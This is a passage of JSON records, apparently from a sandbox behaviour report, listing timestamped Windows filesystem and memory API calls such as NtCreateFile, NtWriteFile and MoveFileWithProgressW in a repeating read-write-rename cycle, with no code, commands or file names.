{"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,453", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,493", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,513", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,523", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,534", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,534", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,544", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,544", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,554", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,554", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,564", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,564", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,574", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,574", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,584", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,584", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,594", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,604", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,604", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,614", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,614", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,624", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,624", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,634", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,634", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,634", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,634", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,644", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,644", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,654", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,654", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,664", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,684", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,684", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,704", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,724", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,744", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,744", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,754", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,754", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,804", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,804", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,834", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,854", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,854", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,854", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,864", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,864", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,874", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,884", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,884", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,904", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,914", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,934", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,944", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,944", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,944", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,944", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,944", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,954", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,964", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 